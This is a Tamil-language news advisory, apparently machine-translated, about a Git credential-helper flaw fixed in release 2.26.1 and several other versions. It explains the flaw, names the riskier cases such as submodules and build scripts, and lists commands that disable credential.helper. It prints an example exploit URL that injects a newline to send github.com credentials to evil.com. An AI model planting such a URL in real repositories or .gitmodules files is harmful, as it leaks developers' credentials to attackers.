விநியோகிக்கப்பட்ட மூலக் கட்டுப்பாட்டு அமைப்பு Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 மற்றும் 2.17.4 இன் சரிசெய்தல் வெளியீடுகள் நீக்கப்பட்டது () ஹேண்ட்லரில் "", இது ஒரு புதிய வரி எழுத்துடன் சிறப்பாக வடிவமைக்கப்பட்ட URL ஐப் பயன்படுத்தி ஒரு கிட் கிளையன்ட் ஒரு களஞ்சியத்தை அணுகும்போது தவறான ஹோஸ்டுக்கு நற்சான்றிதழ்கள் அனுப்பப்படும். தாக்குதலால் கட்டுப்படுத்தப்படும் சேவையகத்திற்கு அனுப்பப்படும் மற்றொரு ஹோஸ்டிலிருந்து நற்சான்றிதழ்களை ஏற்பாடு செய்ய பாதிப்பைப் பயன்படுத்தலாம்.
“https://evil.com?%0ahost=github.com/” போன்ற URL ஐக் குறிப்பிடும்போது, ஹோஸ்ட் evil.com உடன் இணைக்கும் போது நற்சான்றிதழ் கையாளுபவர் github.com க்காகக் குறிப்பிடப்பட்ட அங்கீகார அளவுருக்களைக் கடந்து செல்லும். சப்மாட்யூல்களுக்கான செயலாக்க URLகள் உட்பட, "git clone" போன்ற செயல்பாடுகளைச் செய்யும்போது சிக்கல் ஏற்படுகிறது (உதாரணமாக, "git submodule update" ஆனது களஞ்சியத்திலிருந்து .gitmodules கோப்பில் குறிப்பிடப்பட்டுள்ள URLகளை தானாகவே செயலாக்கும்). டெவலப்பர் URL ஐப் பார்க்காமல் ஒரு களஞ்சியத்தை குளோன் செய்யும் சூழ்நிலைகளில் பாதிப்பு மிகவும் ஆபத்தானது, எடுத்துக்காட்டாக, துணைத் தொகுதிகளுடன் பணிபுரியும் போது அல்லது தானியங்கி செயல்களைச் செய்யும் அமைப்புகளில், எடுத்துக்காட்டாக, தொகுப்பு உருவாக்க ஸ்கிரிப்ட்களில்.
புதிய பதிப்புகளில் பாதிப்புகளைத் தடுக்க நற்சான்றிதழ் பரிமாற்ற நெறிமுறை மூலம் அனுப்பப்படும் எந்த மதிப்புகளிலும் புதிய வரி எழுத்தை அனுப்புதல். விநியோகங்களுக்கு, பக்கங்களில் தொகுப்பு புதுப்பிப்புகளின் வெளியீட்டைக் கண்காணிக்கலாம் , , , , , , .
சிக்கலைத் தடுப்பதற்கான ஒரு தீர்வாக பொது களஞ்சியங்களை அணுகும் போது credential.helper ஐப் பயன்படுத்த வேண்டாம் மற்றும் தேர்வு செய்யப்படாத களஞ்சியங்களுடன் "--recurse-submodules" பயன்முறையில் "git clone" ஐப் பயன்படுத்த வேண்டாம். credential.helper handlerஐ முழுவதுமாக முடக்க, இது செய்கிறது மற்றும் கடவுச்சொற்களை மீட்டெடுக்கிறது , பாதுகாக்கப்பட்டது அல்லது கடவுச்சொற்களைக் கொண்ட கோப்பு, நீங்கள் கட்டளைகளைப் பயன்படுத்தலாம்:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
ஆதாரம்: opennet.ru